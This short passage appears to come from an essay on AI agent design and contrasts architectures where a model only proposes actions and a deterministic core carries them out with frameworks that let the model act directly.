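The model proposes; the deterministic core disposes. That division is exactly what the agent frameworks under discussion give up when they let the model act directly.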